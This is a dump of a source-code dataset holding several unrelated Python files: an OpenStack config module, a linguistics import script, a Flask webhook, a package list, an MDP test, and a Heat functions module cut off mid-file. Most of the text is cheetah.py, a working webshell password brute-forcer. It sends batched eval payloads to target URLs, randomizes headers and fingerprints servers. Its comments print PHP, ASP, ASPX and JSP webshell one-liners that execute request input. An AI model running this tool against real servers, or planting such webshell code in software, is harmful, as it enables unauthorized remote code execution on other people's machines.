repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
sunnyelf/cheetah | cheetah.py | 1 | 22333 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Cheetah is a dictionary-based webshell password violent cracker
that runs like a cheetah hunt for prey as swift and violent.
Cheetah's working principle is that it can submit a large number
of detection passwords based on different web services at once,
blasting efficiency is thousands of times other common webshell
password violent crack tools.
"""
# payload format
# php: => <?php @eval($_GET['sunnyelf']);?> or <?php @eval($_POST['sunnyelf']);?>
# http://localhost/shell_get.php?pwd=$s=pwd;print($s);&sunnyelf=$s=sunnyelf;print($s);
# asp: => <%eval request("sunnyelf")%>
# http://localhost/shell.asp?pwd=response.write("pwd")&sunnyelf=response.write("sunnyelf")
# aspx: => <%@ Page Language="Jscript"%><%eval(Request.Item["sunnyelf"]);%>
# http://localhost/shell.aspx?pwd=Response.Write("pwd");&sunnyelf=Response.Write("sunnyelf")
# jsp: => <%Runtime.getRuntime().exec(request.getParameter("sunnyelf"));%>
# http://localhost/shell.jsp?pwd=System.out.println("pwd");&sunnyelf=System.out.println("sunnyelf");
import os
import re
import sys
import time
import signal
import string
import random
import requests
import argparse
__program__ = 'cheetah'
__version__ = '1.0.0'
__license__ = 'GNU GPLv3'
__author__ = 'sunnyelf[@hackfun.org]'
__github__ = 'https://github.com/sunnyelf/cheetah'
red = '\033[1;31m'
green = '\033[1;32m'
yellow = '\033[1;33m'
white = '\033[1;37m'
reset = '\033[0m'
def set_coding():
if sys.version_info.major == 2:
if sys.getdefaultencoding() is not 'utf-8':
reload(sys)
sys.setdefaultencoding('utf-8')
def print_highlight(message):
times = get_time()
msg_level = {'INFO': green, 'HINT': white, 'WARN': yellow, 'ERROR': red}
for level, color in msg_level.items():
if level in message:
print(color+times+message+reset)
return
print(white+times+message+reset)
return
def get_time():
return '[' + time.strftime("%H:%M:%S", time.localtime()) + '] '
def exit_cheetah(signum, frame):
print_highlight('[HINT] you pressed the Ctrl + C key to terminate cheetah')
print_highlight('[INFO] the cheetah end execution')
exit(signum)
def print_info():
print('program: ' + __program__)
print('version: ' + __version__)
print('license: ' + __license__)
print('author: ' + __author__)
print('github: ' + __github__)
print('')
print('description: ' + __doc__)
def print_banner():
banner = r"""
_________________________________________________
______ _____ ______
__________ /_ _____ _____ __ /_______ ____ /_
_ ___/__ __ \_ _ \_ _ \_ __/_ __ \ __ __ \
/ /__ _ / / // __// __// /_ / /_/ / _ / / /
\___/ / / /_/ \___/ \___/ \__/ \____/ / / /_/
/_/ /_/
a very fast brute force webshell password tool.
"""
print(white+banner+reset)
def read_chunks(pwd_file):
with open(pwd_file) as pwd_file:
while 1:
chunk_data = pwd_file.read(100 * 1024 * 1024)
if not chunk_data:
break
yield chunk_data
def process_pwd_file(options):
for i in range(len(options.pwd_file_list)):
file_name = options.pwd_file_list[i]
print_highlight('[INFO] removing duplicate rows in '+file_name)
time_str = str(time.strftime("%y-%m-%d(%H,%M,%S)_", time.localtime()))
new_file_name = 'data/solved_at_' + time_str + os.path.basename(file_name)
with open(new_file_name, 'a') as new_file:
for chunk in read_chunks(file_name):
new_file.write('\n'.join(set(chunk.split())).lower())
options.pwd_file_list[i] = new_file_name
print_highlight('[HINT] duplicate rows have been removed')
return
def gen_random_header(options):
if options.verbose:
print_highlight('[INFO] generating a random request header')
with open('data/user-agent.list') as agent_file:
agent_list = agent_file.readlines()
random_agent = random.choice(agent_list).replace('\n', '')
reg = '[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+'
header = {'Host': re.search(reg, options.url).group(0),
'User-Agent': random_agent,
'Accept': '*/*',
'Accept-Encoding': '*',
'Accept-Language': '*',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive'}
return header
def req_get(payload, times, options):
header = gen_random_header(options)
if options.time != 0:
print_highlight('[HINT] sleeping '+str(options.time)+' seconds to request')
time.sleep(options.time)
if options.verbose:
print_highlight('[INFO] getting '+str(times)+'th group payload to '+options.url)
print_highlight('[HINT] waiting for web server response')
try:
r = requests.get(url=options.url,
headers=header,
params=payload,
timeout=10,
verify=False)
except Exception as e:
print_highlight(e.message)
return 'error'
error_msg = '[ERROR] '+options.url+' response code: '+str(r.status_code)
if r.status_code == 404:
print_highlight(error_msg)
print_highlight('[WARN] maybe the request url incorrect')
print_highlight('[HINT] try to check the url '+options.url)
return 'error'
code = [413, 414, 500]
if r.status_code in code:
print_highlight(error_msg)
print_highlight('[WARN] request url too long when request '+options.url)
print_highlight('[HINT] try to specify a smaller value of parameter -n')
return 'error'
if r.status_code in range(200, 300):
pwd_hint = '[HINT] password of '+options.url
print_highlight('[INFO] web server responds successfully')
if r.text in payload:
print(white+get_time()+pwd_hint+' is '+reset+red+r.text+reset)
with open('data/find.list', 'a') as find_file:
find_file.write(options.url+'\t\t'+r.text+'\n')
print_highlight('[HINT] password has been written to data/find.list file')
return 'find'
else:
if options.verbose:
print_highlight(pwd_hint+' not in '+str(times)+' th group payload')
return 'notfind'
else:
print_highlight(error_msg)
return 'error'
def req_post(payload, times, options):
header = gen_random_header(options)
if options.time != 0:
print_highlight('[HINT] sleeping '+str(options.time)+' seconds to request')
time.sleep(options.time)
if options.verbose:
print_highlight('[INFO] posting '+str(times)+'th group payload to '+options.url)
print_highlight('[HINT] waiting for web server response')
try:
r = requests.post(url=options.url,
headers=header,
data=payload,
timeout=10,
verify=False)
except Exception as e:
print_highlight('[ERROR] '+str(e))
return 'error'
error_msg = '[ERROR] '+options.url+' response code: '+str(r.status_code)
if r.status_code == 404:
print_highlight(error_msg)
print_highlight('[WARN] maybe the request url incorrect')
print_highlight('[HINT] try to check the url '+options.url)
return 'error'
code = [413, 414, 500]
if r.status_code in code:
print_highlight(error_msg)
print_highlight('[WARN] request url too long when request '+options.url)
print_highlight('[HINT] try to specify a smaller value of parameter -n')
return 'error'
if r.status_code in range(200, 300):
pwd_hint = '[HINT] the password of ' + options.url
if options.verbose:
print_highlight('[INFO] web server responds successfully')
if r.text in payload:
print(white+get_time()+pwd_hint+' is '+reset+red+r.text+reset)
with open('data/find.list', 'a') as find_file:
find_file.write(options.url+'\t\t'+r.text+'\n')
print_highlight('[HINT] password has been written to data/find.list')
return 'find'
else:
if options.verbose:
print_highlight(pwd_hint+' not in '+str(times)+' th group payload')
return 'notfind'
else:
print_highlight(error_msg)
return 'error'
def detect_web(options):
print_highlight('[WARN] not specify the web server or shell type')
print_highlight('[INFO] detecting server info of '+options.url)
server_list = ['apache', 'nginx', 'iis']
shell_list = ['php', 'aspx', 'asp', 'jsp']
header = gen_random_header(options)
web_hint = '[HINT] web server may be '
shell_hint = '[HINT] the shell type may be '
if options.shell == 'detect':
for shell in shell_list:
if shell in options.url.lower():
print_highlight(shell_hint+shell)
options.shell = shell
break
if options.server == 'detect' or options.shell == 'detect':
try:
get_rsp = requests.get(url=options.url, headers=header, verify=False)
except Exception as e:
print_highlight('[ERROR] '+str(e))
return 'error'
if 'server' in get_rsp.headers:
print_highlight(web_hint+get_rsp.headers['server'])
options.server = get_rsp.headers['server'].lower()
if 'x-powered-by' in get_rsp.headers:
power_hint = '[HINT] web server may be x-powered-by '
print_highlight(power_hint+get_rsp.headers['x-powered-by'])
if options.shell == 'detect':
for shell in shell_list:
if shell in get_rsp.headers['x-powered-by'].lower():
print_highlight(shell_hint+shell)
options.shell = shell
break
if options.server == 'detect':
for server in server_list:
if server in get_rsp.headers['x-powered-by'].lower():
print_highlight(web_hint+server)
options.server = server
break
if options.server == 'detect':
random_str = str(random.sample(string.printable, 5)).encode('hex')
reg = 'http(s)?:\/\/[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+'
random_url = re.search(reg, options.url).group(0) + random_str
random_rsp = requests.get(url=random_url, headers=header, verify=False)
if random_rsp.status_code == 404:
for server in server_list:
if server in str(random_rsp.text).lower():
print_highlight(web_hint+server)
options.server = server
break
if options.server == 'detect':
put_rsp = requests.put(url=options.url, headers=header)
if put_rsp.status_code == 405 or put_rsp.status_code == 411:
options.server = 'nginx'
print_highlight(web_hint+options.server)
if put_rsp.status_code == 200:
options.server = 'apache'
print_highlight(web_hint+options.server)
if options.server == 'detect':
del_rsp = requests.delete(url=options.url, headers=header)
if del_rsp.status_code == 501:
options.server = 'iis'
print_highlight(web_hint+options.server)
if del_rsp.status_code == 403:
options.server = 'apache'
print_highlight(web_hint+options.server)
def set_max_req(options):
if options.max_request is None:
print_highlight('[WARN] you did not specify the maximum request parameter')
server_dict = {'apache': {'post': 1000, 'get': 100},
'nginx': {'post': 1000, 'get': 756},
'iis': {'post': 4000, 'get': 45}}
for server in server_dict:
if server in options.server:
print_highlight('[INFO] setting the number of request parameters '
+ str(server_dict[server][options.req_type]))
options.max_request = server_dict[server][options.req_type]
break
if options.max_request is None:
if options.req_type == 'post':
print_highlight('[INFO] the web server '+options.server+' '+options.req_type+' default setting 10000')
options.max_request = 1000
if options.req_type == 'get':
print_highlight('[INFO] the web server '+options.server+' '+options.req_type+' default setting 100')
options.max_request = 100
def dict_attack(options):
if options.server == 'detect' or options.shell == 'detect':
if detect_web(options) == 'error':
return 'error'
set_max_req(options)
pwd_file_find = ''
for pwd_file_name in options.pwd_file_list:
print_highlight('[INFO] opening password file '+pwd_file_name)
try:
pwd_file = open(pwd_file_name)
except Exception as e:
print_highlight('[ERROR]'+str(e))
print_highlight('[INFO] the cheetah end execution')
exit(1)
print_highlight('[HINT] using password file '+pwd_file_name)
print_highlight('[INFO] cracking password of '+options.url)
payload = dict()
times = 1
pwd_find = ''
for pwd in pwd_file:
pwd = pwd.replace('\n', '')
if options.shell == 'php':
payload[pwd] = '$s='+pwd+';print($s);'
if options.shell == 'asp':
payload[pwd] = 'response.write("'+pwd+'")'
if options.shell == 'aspx':
payload[pwd] = 'Response.Write("'+pwd+'");'
if options.shell == 'jsp':
payload[pwd] = 'System.out.println("'+pwd+'");'
if len(payload) == options.max_request:
if options.req_type == 'post':
res = req_post(payload, times, options)
if res == 'find':
pwd_find = 'find'
break
if res == 'error':
pwd_find = 'error'
break
if options.req_type == 'get':
res = req_get(payload, times, options)
if res == 'find':
pwd_find = 'find'
break
if res == 'error':
pwd_find = 'error'
break
payload.clear()
times += 1
if len(payload) < options.max_request:
if options.req_type == 'post':
res = req_post(payload, times, options)
if res == 'find':
pwd_file_find = 'find'
break
if res == 'error':
pwd_file_find = 'error'
break
if options.req_type == 'get':
res = req_get(payload, times, options)
if res == 'find':
pwd_file_find = 'find'
break
if res == 'error':
pwd_file_find = 'error'
break
pwd_file.close()
if pwd_find == 'find':
pwd_file_find = 'find'
break
if pwd_find == 'error':
pwd_file_find = 'error'
break
if pwd_file_find == 'find':
return 'find'
if pwd_file_find == 'error':
return 'error'
print_highlight('[WARN] the cheetah did not find the webshell password')
print_highlight('[HINT] try to change a better password dictionary file')
print_highlight('[HINT] try to specify a smaller value of parameter -n')
if options.req_type == 'post':
print_highlight('[HINT] try to specify parameter -r for GET request')
if options.req_type == 'get':
print_highlight('[HINT] try to specify parameter -r for POST request')
def main():
set_coding()
print_banner()
if len(sys.argv) == 1:
print('[*] try to use -h or --help show help message')
exit(1)
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter,
epilog='''\
use examples:
python cheetah.py -u http://orz/orz.php
python cheetah.py -u http://orz/orz.jsp -r post -n 1000 -v
python cheetah.py -u http://orz/orz.asp -r get -c -p data/pwd.list
python cheetah.py -u http://orz/orz -w aspx -s iis -n 1000
python cheetah.py -b url.list -c -p pwd1.list pwd2.list -v''')
parser.add_argument('-i', '--info', action='store_true', dest='info',
help='show information of cheetah and exit')
parser.add_argument('-v', '--verbose', action='store_true', dest='verbose',
help='enable verbose output(default disabled)')
parser.add_argument('-c', '--clear', action='store_true', dest='remove',
help='clear duplicate password(default disabled)')
parser.add_argument('-up', '--update', action='store_true', dest='update',
help='update cheetah')
parser.add_argument('-r', '--request', default='post', dest='req_type',
choices=['GET', 'get', 'POST', 'post'], metavar='',
help="specify request method(default POST)")
parser.add_argument('-t', '--time', type=float, default=0,
dest='time', metavar='',
help='specify request interval seconds(default 0)')
parser.add_argument('-w', '--webshell', default='detect', metavar='',
choices=['php', 'asp', 'aspx', 'jsp'],
help="specify webshell type(default auto-detect)",
dest='shell')
parser.add_argument('-s', '--server', default='detect',
dest='server', metavar='',
choices=['apache', 'nginx', 'iis'],
help="specify web server name(default auto-detect)")
parser.add_argument('-n', '--number', type=int,
dest='max_request', metavar='',
help='specify the number of request parameters')
parser.add_argument('-u', '--url', metavar='', dest='url',
help='specify the webshell url')
parser.add_argument('-b', '--url-file', dest='url_file', metavar='',
help='specify batch webshell urls file')
parser.add_argument('-p', nargs='+', default='data/pwd.list',
dest='pwd_file_list', metavar='FILE',
help='specify password file(default pwd.list)')
options = parser.parse_args()
if options.update:
abs_dir = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(abs_dir, '.git')):
print('[*] hint: use "git pull origin master" update cheetah')
exit(0)
if not os.path.isfile(os.path.join(abs_dir, 'update.py')):
print('[!] error: can not find file update.py')
print('[*] hint: use "git clone '+__github__+'.git" to update')
print('[*] hint: open link '+__github__+' with browser to download')
exit(0)
else:
print('[*] hint: try to use "python update.py" to update cheetah')
exit(0)
if options.info:
print_info()
exit(0)
if options.url is None and options.url_file is None:
print('[!] error: the argument -u or -uf is required')
exit(1)
if isinstance(options.pwd_file_list, str):
options.pwd_file_list = [options.pwd_file_list]
options.req_type = options.req_type.lower()
options.server = options.server.lower()
print_highlight('[INFO] the cheetah start execution')
signal.signal(signal.SIGINT, exit_cheetah)
if options.verbose:
print_highlight('[INFO] using verbose mode')
if options.remove:
process_pwd_file(options)
if options.req_type == 'post':
print_highlight('[HINT] using POST request mode')
if options.req_type == 'get':
print_highlight('[HINT] using GET request mode')
if options.time < 0 or options.time > 3600:
print_highlight('[ERROR] invalid request interval time '+str(options.time))
print_highlight('[HINT] valid request interval seconds is 0 ~ 3600')
print_highlight('[INFO] the cheetah end execution')
exit(1)
print_highlight('[HINT] setting request interval seconds '+str(options.time))
if options.url is not None:
print_highlight('[HINT] using dictionary-based password attack')
print_highlight('[INFO] cracking password of '+options.url)
attack_res = dict_attack(options)
if attack_res == 'find' or attack_res == 'error':
pass
if options.url_file is not None:
print_highlight('[HINT] using batch cracking mode')
print_highlight('[INFO] opening urls file '+options.url_file)
with open(options.url_file) as url_file:
print_highlight('[INFO] using urls file '+options.url_file)
print_highlight('[HINT] using dictionary-based password attack')
for url_line in url_file:
options.url = url_line.replace('\n', '')
attack_res = dict_attack(options)
if attack_res == 'find' or attack_res == 'error':
continue
print_highlight('[INFO] the cheetah end execution')
if __name__ == '__main__':
main()
| gpl-3.0 | -6,054,936,873,131,986,000 | 38.828154 | 114 | 0.53862 | false |
savi-dev/quantum | quantum/plugins/ryu/common/config.py | 1 | 1388 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from quantum.openstack.common import cfg
database_opts = [
cfg.StrOpt('sql_connection', default='sqlite://'),
cfg.IntOpt('reconnect_interval', default=2),
]
ovs_opts = [
cfg.StrOpt('integration_bridge', default='br-int'),
cfg.StrOpt('openflow_controller', default='127.0.0.1:6633'),
cfg.StrOpt('openflow_rest_api', default='127.0.0.1:8080'),
]
agent_opts = [
cfg.IntOpt('polling_interval', default=2),
cfg.StrOpt('root_helper', default='sudo'),
]
def parse(config_file):
conf = cfg.ConfigOpts()
conf(args=[], default_config_files=[config_file])
conf.register_opts(database_opts, "DATABASE")
conf.register_opts(ovs_opts, "OVS")
conf.register_opts(agent_opts, "AGENT")
return conf
| apache-2.0 | -5,678,480,904,733,669,000 | 31.27907 | 78 | 0.693084 | false |
digling/sinotibetan | datasets/TBL/import.py | 1 | 3518 | # author : Johann-Mattis List
# email : [email protected]
# created : 2015-04-27 13:03
# modified : 2015-04-27 13:03
"""
import new data (TBL)
"""
__author__="Johann-Mattis List"
__date__="2015-04-27"
from lingpy import *
from lingpyd.plugins.lpserver.lexibase import LexiBase,load_sqlite
changes = dict([
('the breast','the breast (female)'),
('the hair', 'the hair (of the head)'),
('to plant','to plant (vegetals, rice)'),
('we [first person plural]', 'we [first person plural inclusive]'),
])
base = csv2list('matches.tsv')
_groups = csv2list('tbl.languages.tsv')
groups = {}
for g in _groups:
groups[g[1].strip()] = g[3].split(' - ')[1]
clean = lambda x: ''.join([y for y in x if y not in '[]()?{}']).replace(' ','_')
wl = LexiBase(load_sqlite('sinotibetan', 'sinotibetan.sqlite3',
url='http://tsv.lingpy.org/triples/sinotibetan.sqlite3'
))
for k in wl:
concept = wl[k,'concept']
if concept in changes:
wl[k][wl.header['concept']] = changes[concept]
wl.add_entries('taxon_name_in_source','doculect',lambda x: x)
wl2 = Wordlist('tbl-stdb.tsv')
wl2.add_entries('source','ipa',lambda x: 'STEDT/TBL')
wl2.add_entries('STEDT_TAXON_NAME', 'doculect', lambda x:x)
for k in wl2:
wl2[k][wl2.header['doculect']] = clean(wl2[k,'taxa'])
wl2.add_entries('subgroup', 'stedt_taxon_name', lambda x: groups[x])
wl2.output('tsv', filename='tbl-update', subset=True, rows=dict(
subgroup = '!= "Burmish"', ipa = '!= "*"'))
wl2 = Wordlist('tbl-update.tsv')
blacklist = []
for k in wl.taxa:
entries = wl.get_list(doculect=k, entry='ipa', flat=True)
if len(set(entries)) < 10:
blacklist += wl.get_list(doculect=k, flat=True)
commons = [t for t in wl.taxa if t in wl2.taxa]
for k in wl:
if wl[k,'taxa'] in commons or wl[k,'subgroup'] == 'Burmish':
blacklist += [k]
wl.blacklist = blacklist
wl.add_data(wl2)
check = lambda x: ''.join([y for y in x if y not in '*?!- ']).strip()
D = {}
D[0] = sorted(wl.header, key=lambda x: wl.header[x])
for k in wl:
if k not in blacklist and check(wl[k,'ipa']):
D[k] = wl[k]
wln = LexiBase(D)
wln.create('sinotibetan', dbase='sinotibetan.sqlite3')
#wl.output('tsv', filename='sinotibetan-dbase', subset=True, rows=dict(
# ID = 'not in '+str(blacklist)))
#wl.create('sinotibetan', dbase='sinotibetan.sqlite3', ignore=False)
#import os
#os.system('mv sinotibetan.sqlite3 ~/projects/websites/dighl/triples/')
#
#
## in later steps:
## re-link the data
#db = LexiBase('sinotibetan.sqlite3')
#txt1 = ''
#concepts = sorted(set([db[k,'concept'] for k in db]))
#for c in concepts:
#
# # determine coverage
# cov = len([db[k,'concept'] for k in db if db[k,'concept'] == c])
# if cov > 7:
# txt1 += '<option value="'+c+'" selected>'+c+' ('+str(cov)+')</option>'
# else:
# txt1 += '<option value="'+c+'">'+c+'('+str(cov)+')</option>'
#
#txt2 = ''
#langs = [db[k,'taxon'] for k in db]
#langs = sorted(set(langs))
#
#for k in langs:
# txt2 += '<option value="'+k+'">'+k+'</option>'
#
#txt3 = ''
#for col in sorted(db.header, key=lambda x: db.header[x]):
# txt3 += '<option value="'+col.upper()+'" selected>'+col.upper()+'</option>'
#
#with open('website/index.template.html') as f:
# d = f.read()
# d = d.format(JS=open('website/stb.js').read(),
# DOCULECTS = txt2,
# CONCEPTS = txt1,
# CONTENT = txt3
# )
#with open('website/index.html', 'w') as f:
# f.write(d)
| gpl-2.0 | 1,753,425,669,453,039,900 | 28.563025 | 80 | 0.59892 | false |
ashokpsg/apiai-weather-webhook-sample | app.py | 1 | 3046 | #!/usr/bin/env python
import urllib
import json
import os
import sys
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = processRequest(req)
print("Request processed")
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
print(r)
r.headers['Content-Type'] = 'application/json'
return r
def processRequest(req):
if req.get("result").get("action") != "createCheckBook":
return {}
baseurl = "https://ldcif6u.wdf.sap.corp:44304/sap/opu/odata/sap/ZIVRC_SRV/WorkItems("
print(baseurl)
yql_query = makeYqlQuery(req)
print("yql_query1:")
print(yql_query)
if yql_query is None:
return {}
yql_url = baseurl + urllib.urlencode({yql_query}) + "?$format=json"
print(yql_query)
result = urllib.urlopen(baseurl).read()
print(result)
data = json.loads(result)
print("data1:")
print(data)
res = makeWebhookResult(data)
return res
def makeYqlQuery(req):
result = req.get("result")
print("result1:")
print(result)
parameters = result.get("parameters")
print("parameters1:")
print(parameters)
city = parameters.get("workitemtype")
print("City1:")
print(city)
if city is None:
return None
return "guid'" + "0005EEE4-48CC-1ED5-B0C9-FA163EA701AC" + "')"
#return "select * from weather.forecast where woeid in (select woeid from geo.places(1) where text='" + city + "')"
def makeWebhookResult(data):
print("MakeWebhook method")
query = data.get('d')
print("Query1:")
print(query)
if query is None:
return {}
result = query.get('WORKITEM_ID')
if result is None:
return {}
channel = query.get('DESCRIPTION')
if channel is None:
return {}
# item = channel.get('item')
# location = channel.get('location')
# units = channel.get('units')
# if (location is None) or (item is None) or (units is None):
# return {}
# condition = item.get('condition')
# if condition is None:
# return {}
# print(json.dumps(item, indent=4))
# speech = "Today in " + location.get('city') + ": " + condition.get('text') + \
# ", the temperature is " + condition.get('temp') + " " + units.get('temperature')
speech = " The Work Item No. " + result + " has been created for " + channel
print("Response1:")
print(speech)
return {
"speech": speech,
"displayText": speech,
# "data": data,
# "contextOut": [],
"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print "Starting app on port %d" % port
app.run(debug=False, port=port, host='0.0.0.0')
| apache-2.0 | 3,322,779,132,360,774,700 | 23.174603 | 118 | 0.599146 | false |
aroth-arsoft/arsoft-meta-packages | grp_libreoffice.py | 1 | 2414 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;
libreoffice = [
{'name':'common',
'mainpackage':True,
'shortdesc':'Installs LibreOffice',
'description':'',
'side-by-side':['german', 'english', 'gnome', 'kde'],
'packages':['libreoffice', 'libreoffice-calc', 'libreoffice-math',
'libreoffice-writer', 'libreoffice-impress', 'libreoffice-draw',
'libreoffice-base', 'libreoffice-pdfimport', 'libreoffice-base-core',
'libreoffice-core',
'libreoffice-officebean',
'libreoffice-style-hicontrast',
'libreoffice-style-breeze', 'libreoffice-style-oxygen',
'hunspell-dictionary', 'myspell-dictionary',
'pstoedit']
},
{'name':'english',
'shortdesc':'Installs english language and help files for LibreOffice',
'description':'',
'depends':['common'],
'side-by-side':['german', 'gnome', 'kde'],
'packages':['aspell-en', 'wamerican-large', 'wbritish-large', 'mythes-en-us', 'mythes-en-au',
'hyphen-en-gb', 'hyphen-en-us',
'libreoffice-l10n-en-gb',
]
},
{'name':'german',
'shortdesc':'Installs german language and help files for LibreOffice',
'description':'',
'depends':['common'],
'side-by-side':['english', 'gnome', 'kde'],
'packages':['wngerman', 'aspell-de', 'mythes-de', 'hyphen-de',
'libreoffice-l10n-de'
]
},
{'name':'gnome',
'shortdesc':'Installs GNOME support files for LibreOffice',
'description':'',
'depends':['common'],
'side-by-side':['kde', 'english', 'german'],
'packages':['libreoffice-gnome'],
},
{'name':'kde',
'shortdesc':'Installs KDE support files for LibreOffice',
'description':'',
'depends':['common'],
'side-by-side':['gnome', 'english', 'german'],
'packages':['libreoffice-kde'],
},
{'name':'none',
'shortdesc':'Uninstalls LibreOffice',
'description':'',
'packages':[],
'noconflicts':['pstoedit',
'hunspell-dictionary', 'myspell-dictionary',
'aspell-en', 'wamerican-large', 'wbritish-large',
'mythes-en-us', 'mythes-en-au', 'mythes-de',
'hyphen-en-gb', 'hyphen-en-us', 'hyphen-de',
'wngerman', 'aspell-de']
},
]
| gpl-3.0 | 2,647,278,325,148,330,000 | 35.575758 | 97 | 0.562138 | false |
zafarali/emdp | tests/test_chain_MDP.py | 1 | 1393 | from emdp import build_chain_MDP
import numpy as np
def test_build_chain_MDP():
mdp = build_chain_MDP(n_states=3, starting_distribution=np.array([0, 0, 1]),
terminal_states=[0], reward_spec=[(1, 0, +5)], p_success=0.9)
"""
this MDP looks like this:
[ 0 ] --> [ 0 ] with probability 1 for all actions
[ 1 ] --> [ 2 ] with probability 0.9 if taking RIGHT
[ 1 ] --> [ 0 ] with probability 0.9 if taking LEFT (also gets a reward of +1)
[ 2 ] --> [ 2 ] with probability 1 if taking RIGHT
[ 2 ] --> [ 1 ] with probability 0.9 if taking LEFT
"""
assert mdp.P[0][0][0] == 1 and mdp.P[0][1][0] == 1, 'terminal state is non absorbing.'
assert np.allclose(mdp.P[1][0], np.array([0.9, 0.1, 0])), 'taking the action LEFT from state 1 should go to state 0 with prob 0.9'
assert np.allclose(mdp.P[2][1], np.array([0, 0, 1])), 'taking the action RIGHT from state 2 should go to state 2 with prob 1'
assert np.allclose(mdp.P[2][0], np.array([0, 0.9, 0.1])), 'taking the action LEFT from state 2 should go to state 1 with prob 0.9'
assert np.allclose(mdp.R[0][:], 0), 'No reward from terminal state'
assert mdp.R[1][0] == +5, 'taking LEFT from state 1 should give +5 reward'
assert mdp.R[1][1] == 0, 'taking RIGHT from state 1 should give 0 reward'
assert np.allclose(mdp.R[2][:], 0), 'No reward from other states'
| mit | -5,542,290,806,926,931,000 | 59.565217 | 134 | 0.615937 | false |
steveb/heat | heat/engine/hot/functions.py | 1 | 27032 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import hashlib
import itertools
from oslo_config import cfg
from oslo_serialization import jsonutils
import six
import yaql
from yaql.language import exceptions
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine.cfn import functions as cfn_funcs
from heat.engine import function
opts = [
cfg.IntOpt('limit_iterators',
default=200,
help=_('The maximum number of elements in collection '
'expression can take for its evaluation.')),
cfg.IntOpt('memory_quota',
default=10000,
help=_('The maximum size of memory in bytes that '
'expression can take for its evaluation.'))
]
cfg.CONF.register_opts(opts, group='yaql')
class GetParam(function.Function):
"""A function for resolving parameter references.
Takes the form::
get_param: <param_name>
or::
get_param:
- <param_name>
- <path1>
- ...
"""
def __init__(self, stack, fn_name, args):
super(GetParam, self).__init__(stack, fn_name, args)
self.parameters = self.stack.parameters
def result(self):
args = function.resolve(self.args)
if not args:
raise ValueError(_('Function "%s" must have arguments') %
self.fn_name)
if isinstance(args, six.string_types):
param_name = args
path_components = []
elif isinstance(args, collections.Sequence):
param_name = args[0]
path_components = args[1:]
else:
raise TypeError(_('Argument to "%s" must be string or list') %
self.fn_name)
if not isinstance(param_name, six.string_types):
raise TypeError(_('Parameter name in "%s" must be string') %
self.fn_name)
try:
parameter = self.parameters[param_name]
except KeyError:
raise exception.UserParameterMissing(key=param_name)
def get_path_component(collection, key):
if not isinstance(collection, (collections.Mapping,
collections.Sequence)):
raise TypeError(_('"%s" can\'t traverse path') % self.fn_name)
if not isinstance(key, (six.string_types, int)):
raise TypeError(_('Path components in "%s" '
'must be strings') % self.fn_name)
if isinstance(collection, collections.Sequence
) and isinstance(key, six.string_types):
try:
key = int(key)
except ValueError:
raise TypeError(_("Path components in '%s' "
"must be a string that can be "
"parsed into an "
"integer.") % self.fn_name)
return collection[key]
try:
return six.moves.reduce(get_path_component, path_components,
parameter)
except (KeyError, IndexError, TypeError):
return ''
class GetAttThenSelect(cfn_funcs.GetAtt):
"""A function for resolving resource attributes.
Takes the form::
get_attr:
- <resource_name>
- <attribute_name>
- <path1>
- ...
"""
def _parse_args(self):
if (not isinstance(self.args, collections.Sequence) or
isinstance(self.args, six.string_types)):
raise TypeError(_('Argument to "%s" must be a list') %
self.fn_name)
if len(self.args) < 2:
raise ValueError(_('Arguments to "%s" must be of the form '
'[resource_name, attribute, (path), ...]') %
self.fn_name)
self._path_components = self.args[2:]
return tuple(self.args[:2])
def result(self):
attribute = super(GetAttThenSelect, self).result()
if attribute is None:
return None
path_components = function.resolve(self._path_components)
return attributes.select_from_attribute(attribute, path_components)
def dep_attrs(self, resource_name):
if self._resource().name == resource_name:
path = function.resolve(self._path_components)
attr = [function.resolve(self._attribute)]
if path:
attrs = [tuple(attr + path)]
else:
attrs = attr
else:
attrs = []
return itertools.chain(function.dep_attrs(self.args, resource_name),
attrs)
class GetAtt(GetAttThenSelect):
"""A function for resolving resource attributes.
Takes the form::
get_attr:
- <resource_name>
- <attribute_name>
- <path1>
- ...
"""
def result(self):
path_components = function.resolve(self._path_components)
attribute = function.resolve(self._attribute)
r = self._resource()
if (r.status in (r.IN_PROGRESS, r.COMPLETE) and
r.action in (r.CREATE, r.ADOPT, r.SUSPEND, r.RESUME,
r.UPDATE, r.CHECK, r.SNAPSHOT)):
return r.FnGetAtt(attribute, *path_components)
else:
return None
